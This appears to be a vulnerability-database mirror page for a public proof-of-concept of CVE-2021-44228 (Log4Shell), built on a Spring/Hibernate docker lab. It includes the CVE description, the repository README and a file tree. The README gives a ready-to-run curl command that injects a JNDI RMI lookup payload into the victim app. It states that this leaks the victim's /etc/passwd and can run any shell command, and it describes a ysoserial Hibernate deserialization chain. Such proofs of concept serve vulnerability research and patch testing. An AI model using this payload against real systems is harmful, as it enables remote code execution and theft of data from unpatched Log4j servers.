CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source

https://github.com/uint0/cve-2021-44228--spring-hibernate

Associated Vulnerability

Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Description

CVE-2021-44228 POC - Spring / Hibernate

Readme

# CVE-2021-44228 POC - Spring / Hibernate

_This POC uses Spring / Hibernate, however a similar approach of rmi -> deserialization could be used to trigger any deserialization vulnerability_

# TL;DR

```shell
$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'
```

You should see the contents of the victim's /etc/passwd appear in the logs of the `attacker` container.
You can replace the command in the `exploit` service to run any shell command on the victim.


## Victim

The victim is running a standard [starter spring app](https://start.spring.io/#!type=gradle-project&language=java&platformVersion=2.6.1&packaging=jar&jvmVersion=11&groupId=dev.uint0.pocs&artifactId=cve202144228&name=cve202144228&description=CVE-2021-44228%20POC%20-%20Spring%20%2F%20Hibernate&packageName=dev.uint0.pocs.cve202144228&dependencies=data-jpa,web,h2) with the "Spring Data JPA" (for Hibernate), "Spring Web", and "H2" (as a data store) dependencies. Only 2 modifications have been made on top of this

1. Removed tests
2. Replaced the `slf4j` logger with the vulnerable `log4j`

All dependencies are up to date. There are no magic flags enabled.

The victim exposes a `POST`-able endpoint on `/` which will log the request.


## Exploit

The exploit relies on a fork of [ysoserial](https://github.com/uint0/ysoserial) using the `Hibernate` exploit generator. In order to have the exploit to work with the latest version of hibernate we will need to recompile ysoserial.

File Snapshot


 [4.0K]  /data/pocs/562ce03203cfff38ba31d893173d021b121a7630
├── [ 496]  docker-compose.yml
├── [4.0K]  exploit
│   └── [ 320]  Dockerfile
├── [1.5K]  README.md
└── [4.0K]  victim
    ├── [ 806]  build.gradle
    ├── [ 269]  Dockerfile
    ├── [4.0K]  gradle
    │   └── [4.0K]  wrapper
    │       ├── [ 58K]  gradle-wrapper.jar
    │       └── [ 202]  gradle-wrapper.properties
    ├── [7.9K]  gradlew
    ├── [2.7K]  gradlew.bat
    ├── [  34]  settings.gradle
    └── [4.0K]  src
        └── [4.0K]  main
            ├── [4.0K]  java
            │   └── [4.0K]  dev
            │       └── [4.0K]  uint0
            │           └── [4.0K]  pocs
            │               └── [4.0K]  cve202144228
            │                   ├── [ 332]  Cve202144228Application.java
            │                   └── [ 561]  IndexController.java
            └── [4.0K]  resources
                └── [   1]  application.properties

12 directories, 13 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!